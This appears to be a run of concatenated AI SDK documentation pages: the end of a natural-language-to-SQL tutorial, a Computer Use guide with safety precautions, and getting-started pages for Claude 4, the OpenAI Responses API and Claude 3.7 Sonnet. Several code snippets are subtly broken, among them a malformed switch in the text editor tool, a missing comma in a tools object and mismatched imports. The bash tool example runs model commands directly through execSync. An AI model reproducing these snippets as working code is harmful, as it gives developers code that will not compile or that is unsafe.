With the Server Action in place, you can now update the frontend to call this action when the user submits a natural language query. In the root page (app/page.tsx), you should see a handleSubmit function that is called when the user submits a query.

Import the generateQuery function and call it with the user's input.

/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';

/* ...rest of the file... */

const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Now, when the user submits a natural language query (ie. "how many unicorns are from San Francisco?"), that question will be sent to your newly created Server Action. The Server Action will call the model, passing in your system prompt and the users query, and return the generated SQL query in a structured format. This query is then passed to the runGeneratedSQLQuery action to run the query against your database. The results are then saved in local state and displayed to the user.

Save the file, make sure the dev server is running, and then head to localhost:3000 in your browser. Try submitting a natural language query and see the generated SQL query and results. You should see a SQL query generated and displayed under the input field. You should also see the results of the query displayed in a table below the input field.

Try clicking the SQL query to see the full query if it's too long to display in the input field. You should see a button on the right side of the input field with a question mark icon. Clicking this button currently does nothing, but you'll add the "explain query" functionality to it in the next step.

Explain SQL Queries

Next, let's add the ability to explain SQL queries in plain English. This feature helps users understand how the generated SQL query works by breaking it down into logical sections. As with the SQL query generation, you'll need a prompt to guide the model when explaining queries.

Let's craft a prompt for the explain query functionality:

You are a SQL (postgres) expert. Your job is to explain to the user write a SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.

Like the prompt for generating SQL queries, you provide the model with the schema of the database. Additionally, you provide an example of what each section of the query might look like. This helps the model understand the structure of the query and how to break it down into logical sections.

Create a Server Action

Add a new Server Action to generate explanations for SQL queries.

This action takes two parameters - the original natural language input and the generated SQL query.

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateObject({
      model: openai('gpt-4o'),
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
      ${sqlQuery}`,
    });
    return result.object;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

This action uses the generateObject function again. However, you haven't defined the schema yet. Let's define it in another file so it can also be used as a type in your components.

Update your lib/types.ts file to include the schema for the explanations:

import { z } from 'zod';

/* ...rest of the file... */

export const explanationSchema = z.object({
  section: z.string(),
  explanation: z.string(),
});

export type QueryExplanation = z.infer<typeof explanationSchema>;

This schema defines the structure of the explanation that the model will generate. Each explanation will have a section and an explanation. The section is the part of the query being explained, and the explanation is the plain English explanation of that section. Go back to your actions.ts file and import and use the explanationSchema:

// other imports
import { explanationSchema } from '@/lib/types';

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateObject({
      model: openai('gpt-4o'),
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
      ${sqlQuery}`,
      schema: explanationSchema,
      output: 'array',
    });
    return result.object;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Update query viewer

Next, update the query-viewer.tsx component to display these explanations. The handleExplainQuery function is called every time the user clicks the question icon button on the right side of the query. Let's update this function to use the new explainQuery action:

/* ...other imports... */
import { explainQuery } from '@/app/actions';

/* ...rest of the component... */

const handleExplainQuery = async () => {
  setQueryExpanded(true);
  setLoadingExplanation(true);

  const explanations = await explainQuery(inputValue, activeQuery);
  setQueryExplanations(explanations);

  setLoadingExplanation(false);
};

/* ...rest of the component... */

Now when users click the explanation button (the question mark icon), the component will:

Show a loading state
Send the active SQL query and the users natural language query to your Server Action
The model will generate an array of explanations
The explanations will be set in the component state and rendered in the UI

Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!

Visualizing query results

Finally, let's render the query results visually in a chart. There are two approaches you could take:

Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
Send the query and data to the model and ask it to generate a chart configuration (fixed-size and not many tokens) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importnatly, this is done without requiring the model return the full dataset.

Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.

Generate the chart configuration

For this feature, you'll create a Server Action that takes the query results and the user's original natural language query to determine the best visualization approach. Your application is already set up to use shadcn charts (which uses Recharts under the hood) so the model will need to generate:

Chart type (bar, line, area, or pie)
Axis mappings
Visual styling

Let's start by defining the schema for the chart configuration in lib/types.ts:

/* ...rest of the file... */

export const configSchema = z
  .object({
    description: z
      .string()
      .describe(
        'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
      ),
    takeaway: z.string().describe('What is the main takeaway from the chart?'),
    type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
    title: z.string(),
    xKey: z.string().describe('Key for x-axis or category'),
    yKeys: z
      .array(z.string())
      .describe(
        'Key(s) for y-axis values this is typically the quantitative column',
      ),
    multipleLines: z
      .boolean()
      .describe(
        'For line charts only: whether the chart is comparing groups of data.',
      )
      .optional(),
    measurementColumn: z
      .string()
      .describe(
        'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
      )
      .optional(),
    lineCategories: z
      .array(z.string())
      .describe(
        'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
      )
      .optional(),
    colors: z
      .record(
        z.string().describe('Any of the yKeys'),
        z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
      )
      .describe('Mapping of data keys to color values for chart elements')
      .optional(),
    legend: z.boolean().describe('Whether to show legend'),
  })
  .describe('Chart configuration object');

export type Config = z.infer<typeof configSchema>;

This schema makes extensive use of Zod's .describe() function to give the model extra context about each of the key's you are expecting in the chart configuration. This will help the model understand the purpose of each key and generate more accurate results.

Another important technique to note here is that you are defining description and takeaway fields. Not only are these useful for the user to quickly understand what the chart means and what they should take away from it, but they also force the model to generate a description of the data first, before it attempts to generate configuration attributes like axis and columns. This will help the model generate more accurate and relevant chart configurations.

Create the Server Action

Create a new action in app/actions.ts:

/* ...other imports... */
import { Config, configSchema, explanationsSchema, Result } from '@/lib/types';

/* ...rest of the file... */

export const generateChartConfig = async (
  results: Result[],
  userQuery: string,
) => {
  'use server';

  try {
    const { object: config } = await generateObject({
      model: openai('gpt-4o'),
      system: 'You are a data visualization expert.',
      prompt: `Given the following data from a SQL query result, generate the chart config that best visualises the data and answers the users query.
      For multiple groups use multi-lines.

      Here is an example complete config:
      export const chartConfig = {
        type: "pie",
        xKey: "month",
        yKeys: ["sales", "profit", "expenses"],
        colors: {
          sales: "#4CAF50",    // Green for sales
          profit: "#2196F3",   // Blue for profit
          expenses: "#F44336"  // Red for expenses
        },
        legend: true
      }

      User Query:
      ${userQuery}

      Data:
      ${JSON.stringify(results, null, 2)}`,
      schema: configSchema,
    });

    // Override with shadcn theme colors
    const colors: Record<string, string> = {};
    config.yKeys.forEach((key, index) => {
      colors[key] = `hsl(var(--chart-${index + 1}))`;
    });

    const updatedConfig = { ...config, colors };
    return { config: updatedConfig };
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate chart suggestion');
  }
};

Update the chart component

With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.

Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:

/* ...other imports... */
import { getCompanies, generateQuery, generateChartConfig } from './actions';

/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);

    const { config } = await generateChartConfig(companies, question);
    setChartConfig(config);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Now when users submit queries, the application will:

Generate and run the SQL query
Display the table results
Generate a chart configuration for the results
Allow toggling between table and chart views

Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.

Next steps

You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.

You could, for example, extend the application to use your own data sources or add more advanced features like customizing the chart configuration schema to support more chart types and options. You could also add more complex SQL query generation capabilities.

title: Get started with Computer Use description: Get started with Claude's Computer Use capabilities with the AI SDK tags: ['computer-use', 'tools']

Get started with Computer Use

With the release of Computer Use in Claude 3.5 Sonnet, you can now direct AI models to interact with computers like humans do - moving cursors, clicking buttons, and typing text. This capability enables automation of complex tasks while leveraging Claude's advanced reasoning abilities.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Anthropic's Claude alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more. In this guide, you will learn how to integrate Computer Use into your AI SDK applications.

Computer Use

Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:

Moving the cursor
Clicking buttons
Typing text
Taking screenshots
Reading screen content

How It Works

Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:

Start with a prompt and tools

Add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model. For example: "save an image to your downloads folder."
Select the right tool

The model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
Execute the action and return results

The AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
Complete the task through iterations

Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.

Available Tools

There are three main tools available in the Computer Use API:

Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
Text Editor Tool: Provides functionality for viewing and editing text files
Bash Tool: Allows execution of bash commands

Implementation Considerations

Computer Use tools in the AI SDK are predefined interfaces that require your own implementation of the execution layer. While the SDK provides the type definitions and structure for these tools, you need to:

Set up a controlled environment for Computer Use execution
Implement core functionality like mouse control and keyboard input
Handle screenshot capture and processing
Set up rules and limits for how Claude can interact with your system

The recommended approach is to start with Anthropic's reference implementation , which provides:

A containerized environment configured for safe Computer Use
Ready-to-use (Python) implementations of Computer Use tools
An agent loop for API interaction and tool execution
A web interface for monitoring and control

This reference implementation serves as a foundation to understand the requirements before building your own custom solution.

Getting Started with the AI SDK

First, ensure you have the AI SDK and Anthropic AI SDK provider installed:

You can add Computer Use to your AI SDK applications using provider-defined-client tools. These tools accept various input parameters (like display height and width in the case of the computer tool) and then require that you define an execute function.

Here's how you could set up the Computer Tool with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';

const computerTool = anthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  execute: async ({ action, coordinate, text }) => {
    switch (action) {
      case 'screenshot': {
        return {
          type: 'image',
          data: getScreenshot(),
        };
      }
      default: {
        return executeComputerAction(action, coordinate, text);
      }
    }
  },
  experimental_toToolResultContent(result) {
    return typeof result === 'string'
      ? [{ type: 'text', text: result }]
      : [{ type: 'image', data: result.data, mediaType: 'image/png' }];
  },
});

The computerTool handles two main actions: taking screenshots via getScreenshot() and executing computer actions like mouse movements and clicks through executeComputerAction(). Remember, you have to implement this execution logic (eg. the getScreenshot and executeComputerAction functions) to handle the actual computer interactions. The execute function should handle all low-level interactions with the operating system.

Finally, to send tool results back to the model, use the experimental_toToolResultContent() function to convert text and image responses into a format the model can process. The AI SDK includes experimental support for these multi-modal tool results when using Anthropic's models.

Using Computer Tools with Text Generation

Once your tool is defined, you can use it with both the generateText and streamText functions.

For one-shot text generation, use generateText:

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  prompt: 'Move the cursor to the center of the screen and take a screenshot',
  tools: { computer: computerTool },
});

console.log(result.text);

For streaming responses, use streamText to receive updates in real-time:

const result = streamText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
});

for await (const chunk of result.textStream) {
  console.log(chunk);
}

Configure Multi-Step (Agentic) Generations

To allow the model to perform multiple steps without user intervention, specify a maxSteps value. This will automatically send any tool results back to the model to trigger a subsequent generation:

const stream = streamText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
  maxSteps: 10, // experiment with this value based on your use case
});

Combine Multiple Tools

You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:

const computerTool = anthropic.tools.computer_20241022({
  ...
});

const bashTool = anthropic.tools.bash_20241022({
  execute: async ({ command, restart }) => execSync(command).toString()
});

const textEditorTool = anthropic.tools.textEditor_20241022({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range
  }) => {
    // Handle file operations based on command
    switch(command) {
      return executeTextEditorFunction({
        command,
        path,
        fileText: file_text,
        insertLine: insert_line,
        newStr: new_str,
        oldStr: old_str,
        viewRange: view_range
      });
    }
  }
});


const response = await generateText({
  model: anthropic("claude-3-5-sonnet-20241022"),
  prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    computer: computerTool,
    bash: bashTool
    str_replace_editor: textEditorTool,
  },
});

Best Practices for Computer Use

To get the best results when using Computer Use:

Specify simple, well-defined tasks with explicit instructions for each step
Prompt Claude to verify outcomes through screenshots
Use keyboard shortcuts when UI elements are difficult to manipulate
Include example screenshots for repeatable tasks
Provide explicit tips in system prompts for known tasks

Security Measures

Remember, Computer Use is a beta feature. Please be aware that it poses unique risks that are distinct from standard API features or chat interfaces. These risks are heightened when using Computer Use to interact with the internet. To minimize risks, consider taking precautions such as:

Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
Limit internet access to an allowlist of domains to reduce exposure to malicious content.
Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.

title: Get started with Claude 4 description: Get started with Claude 4 using the AI SDK. tags: ['getting-started']

Get started with Claude 4

With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 4 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

Claude 4

Claude 4 is Anthropic's most advanced model family to date, offering exceptional capabilities across reasoning, instruction following, coding, and knowledge tasks. Available in two variants—Sonnet and Opus—Claude 4 delivers state-of-the-art performance with enhanced reliability and control. Claude 4 builds on the extended thinking capabilities introduced in Claude 3.7, allowing for even more sophisticated problem-solving through careful, step-by-step reasoning.

Claude 4 excels at complex reasoning, code generation and analysis, detailed content creation, and agentic capabilities, making it ideal for powering sophisticated AI workflows, customer-facing agents, and applications requiring nuanced understanding and responses. Claude Opus 4 is an excellent coding model, leading on SWE-bench (72.5%) and Terminal-bench (43.2%), with the ability to sustain performance on long-running tasks that require focused effort and thousands of steps. Claude Sonnet 4 significantly improves on Sonnet 3.7, excelling in coding with 72.7% on SWE-bench while balancing performance and efficiency.

Prompt Engineering for Claude 4 Models

Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:

Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.

Getting Started with the AI SDK

The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoning, reasoningDetails } = await generateText({
  model: anthropic('claude-4-sonnet-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);

Reasoning Ability

Claude 4 enhances the extended thinking capabilities first introduced in Claude 3.7 Sonnet—the ability to solve complex problems with careful, step-by-step reasoning. Additionally, both Opus 4 and Sonnet 4 can now use tools during extended thinking, allowing Claude to alternate between reasoning and tool use to improve responses. You can enable extended thinking using the thinking provider option and specifying a thinking budget in tokens. For interleaved thinking (where Claude can think in between tool calls) you'll need to enable a beta feature using the anthropic-beta header:

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoning, reasoningDetails } = await generateText({
  model: anthropic('claude-4-sonnet-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 15000 },
    } satisfies AnthropicProviderOptions,
  },
  headers: {
    'anthropic-beta': 'interleaved-thinking-2025-05-14',
  },
});

console.log(text); // text response
console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning

Building Interactive Interfaces

AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

With four main hooks — useChat, useCompletion, useObject, and useAssistant — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: anthropic('claude-4-sonnet-20250514'),
    messages,
    headers: {
      'anthropic-beta': 'interleaved-thinking-2025-05-14',
    },
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 15000 },
      } satisfies AnthropicProviderOptions,
    },
  });

  return result.toDataStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
      <div className="flex-1 overflow-y-auto space-y-4 mb-4">
        {messages.map(message => (
          <div
            key={message.id}
            className={`p-3 rounded-lg ${
              message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
            }`}
          >
            <p className="font-semibold">
              {message.role === 'user' ? 'You' : 'Claude 4'}
            </p>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return (
                  <div key={index} className="mt-1">
                    {part.text}
                  </div>
                );
              }
              if (part.type === 'reasoning') {
                return (
                  <pre
                    key={index}
                    className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
                  >
                    <details>
                      <summary className="cursor-pointer">
                        View reasoning
                      </summary>
                      {part.details.map(detail =>
                        detail.type === 'text' ? detail.text : '<redacted>',
                      )}
                    </details>
                  </pre>
                );
              }
            })}
          </div>
        ))}
      </div>
      <form onSubmit={handleSubmit} className="flex gap-2">
        <input
          name="prompt"
          value={input}
          onChange={handleInputChange}
          className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Ask Claude 4 something..."
        />
        <button
          type="submit"
          className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
        >
          Send
        </button>
      </form>
    </div>
  );
}

The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.

Claude 4 Model Variants

Claude 4 is available in two variants, each optimized for different use cases:

Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: OpenAI Responses API description: Get started with the OpenAI Responses API using the AI SDK. tags: ['getting-started', 'agents']

Get started with OpenAI Responses API

With the release of OpenAI's responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI Responses API

OpenAI recently released the Responses API, a brand new way to build applications on OpenAI's platform. The new API offers a way to persist chat history, a web search tool for grounding LLM responses, file search tool for finding relevant files, and a computer use tool for building agents that can interact with and operate computers. Let's explore how to use the Responses API with the AI SDK.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai.responses('gpt-4o'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Web Search Tool

The Responses API introduces a built-in tool for grounding responses called webSearch. With this tool, the model can access the internet to find relevant information for its responses.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview(),
  },
});

console.log(result.text);
console.log(result.sources);

The webSearch tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.

import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview({
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
});

console.log(result.text);
console.log(result.sources);

Using Persistence

With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message and OpenAI can access the entire chat history:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result1 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

const result2 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Summarize in 2 sentences',
  providerOptions: {
    openai: {
      previousResponseId: result1.providerMetadata?.openai.responseId as string,
    },
  },
});

Migrating from Completions API

Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is simple. To migrate, simply change your provider instance from openai(modelId) to openai.responses(modelId):

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

When using the Responses API, provider specific options that were previously specified on the model provider instance have now moved to the providerOptions object:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with Claude 3.7 Sonnet description: Get started with Claude 3.7 Sonnet using the AI SDK. tags: ['getting-started']

Get started with Claude 3.7 Sonnet

With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 3.7 Sonnet alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

Claude 3.7 Sonnet

Claude 3.7 Sonnet is Anthropic's most intelligent model to date and the first Claude model to offer extended thinking—the ability to solve complex problems with careful, step-by-step reasoning. With Claude 3.7 Sonnet, you can balance speed and quality by choosing between standard thinking for near-instant responses or extended thinking or advanced reasoning. Claude 3.7 Sonnet is state-of-the-art for coding, and delivers advancements in computer use, agentic capabilities, complex reasoning, and content generation. With frontier performance and more control over speed, Claude 3.7 Sonnet is a great choice for powering AI agents, especially customer-facing agents, and complex AI workflows.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoning, reasoningDetails } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { reasoning, text } = await generateText({
  model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
});

Reasoning Ability

Claude 3.7 Sonnet introduces a new extended thinking—the ability to solve complex problems with careful, step-by-step reasoning. You can enable it using the thinking provider option and specifying a thinking budget in tokens:

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoning, reasoningDetails } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicProviderOptions,
  },
});

console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response

Building Interactive Interfaces

